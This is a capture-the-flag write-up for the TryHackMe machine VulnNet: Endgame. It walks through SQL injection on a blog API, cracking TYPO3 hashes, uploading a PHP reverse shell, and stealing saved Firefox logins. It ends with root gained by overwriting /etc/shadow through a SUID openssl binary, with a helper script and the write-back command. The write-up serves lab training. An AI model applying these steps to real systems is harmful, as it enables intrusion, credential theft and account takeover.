Create & Destroy

VulnNet: Endgame | TryHackMe

The end of the VulnNet series.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 bb:2e:e6:cc:79:f4:7d:68:2c:11:bc:4b:63:19:08:af (RSA)
|   256 80:61:bf:8c:aa:d1:4d:44:68:15:45:33:ed:eb:82:a7 (ECDSA)
|_  256 87:86:04:e9:e0:c0:60:2a:ab:87:8e:9b:c7:05:35:1c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Not a lot open. We start gobuster and poke at the web app, and quickly find that the site expects the hostname vulnnet.thm, so we add it to /etc/hosts.

Gobuster doesn't find much initially, but fuzzing for subdomains with ffuf turns up a few, so we keep digging.

We discover that blog.vulnnet.thm is running the TYPO3 CMS.

We find no usable vulnerabilities in TYPO3 itself right now, but while browsing the blog we notice that every visit to a post triggers a request to an API endpoint.

That API request is a natural candidate for SQL injection, so we hand it to sqlmap and see whether it comes up with anything...

sqlmap confirms it is injectable and lists three databases we can dump. Let's have a look at blog and vn_admin.

Eventually we find a table (fe_users, TYPO3's frontend user table) containing a username and a hashed password.

Hashcat doesn't handle these Argon2 hashes, so we have to use John the Ripper instead. Cracking against rockyou takes an eternity, but we did pull a big password list out of the blog database; there has to be a reason for 600 passwords sitting in that table, so we use it as the wordlist.

Phew, that did it: we now have a login for the CMS. Before we can upload a PHP reverse shell we have to change the file deny pattern in the backend settings, which blocks PHP uploads by default.

We clear the pattern entirely and upload our reverse shell.

We browse to the shell; the upload directory is hidden from listing, but we know the path.

And like that, we pop a shell as www-data.

After enumerating for quite a while we find that the user system has Firefox installed, which is always worth investigating: a profile directory holds saved logins (logins.json and key4.db).

From one of the profiles we extract Chris_W's saved tryhackme.com credentials.

For a moment it looks like the same password as the TYPO3 one, but it's different, so we try it for SSH.

Whew, it worked. We now have access as system. We're not allowed to run anything with sudo, so there has to be another way to root.

In our home directory there's a copy of the OpenSSL binary with the SUID bit set; per GTFOBins we can use it for arbitrary file read and write as root.

Arbitrary read means we can pull /etc/shadow, and arbitrary write means we can put a modified copy back. The plan: dump /etc/shadow to a file, copy system's password hash onto the root line, write it back, then su to root with system's password.

Reading works, so we dump to /tmp/shadow.txt, edit the root line, and write it back with the same binary:
cat /tmp/shadow.txt | ./openssl enc -out /etc/shadow

With the above command we overwrite /etc/shadow with our modified copy, where root's password is now the same as system's. Keep the original dump around and check that every line still has nine colon-separated fields before writing; a malformed /etc/shadow locks everyone out, including you.
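As an added worked example (not from the original writeup), here is the edit step done without hand-editing the file: given a shadow-format file, copy one user's hash field onto another user's line and sanity-check the result before it goes anywhere near the real /etc/shadow. The sample shadow content is constructed, the hashes are placeholders, the function names are my own, and it assumes a writable /tmp. The privileged read and write themselves are the two SUID openssl invocations from the writeup (`./openssl enc -in` / `-out`), which this example deliberately does not run.

```shell
#!/bin/sh
# Added example, not from the original writeup.
# Operates on a shadow-format file:
#   name:hash:lastchg:min:max:warn:inactive:expire:flag

# clone_shadow_hash FILE SRC_USER DST_USER
# Print FILE to stdout with DST_USER's hash field replaced by SRC_USER's.
# The file is read twice: the first pass grabs the source hash, the
# second pass rewrites the target line and prints everything.
clone_shadow_hash() {
  awk -F: -v OFS=: -v src="$2" -v dst="$3" '
    NR == FNR { if ($1 == src) hash = $2; next }
    $1 == dst && hash != "" { $2 = hash }
    { print }
  ' "$1" "$1"
}

# shadow_hash_of FILE USER : print the hash field for USER
shadow_hash_of() {
  awk -F: -v u="$2" '$1 == u { print $2 }' "$1"
}

# shadow_is_sane FILE : succeed only if every line still has exactly
# nine colon-separated fields (a malformed /etc/shadow locks everyone out)
shadow_is_sane() {
  awk -F: 'BEGIN { bad = 0 } NF != 9 { bad = 1 } END { exit bad }' "$1"
}

# write_sample_shadow FILE : constructed sample, placeholder hashes only
write_sample_shadow() {
  cat > "$1" <<'EOF'
root:*:18900:0:99999:7:::
daemon:*:18900:0:99999:7:::
system:$6$placeholdersalt$placeholderhashvaluefordemoonly:18900:0:99999:7:::
EOF
}

# demo : build the modified copy in /tmp, refuse to proceed if it is
# malformed, and print root's new hash field
demo() {
  tmp=${TMPDIR:-/tmp}/shadow.demo.$$
  write_sample_shadow "$tmp.orig"
  clone_shadow_hash "$tmp.orig" system root > "$tmp.new"
  shadow_is_sane "$tmp.new" || { echo "refusing: malformed shadow" >&2; return 1; }
  shadow_hash_of "$tmp.new" root
  # On the target, the write-back is the writeup's SUID step, e.g.
  #   ./openssl enc -in "$tmp.new" -out /etc/shadow
  # which this example does not run.
  rm -f "$tmp.orig" "$tmp.new"
}

demo
```

On the real box, `$tmp.orig` is the dump you pulled with the SUID openssl read, and only the `.new` copy that passes `shadow_is_sane` should be written back.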

It worked, we’re now root, gobble up the flags and box done.
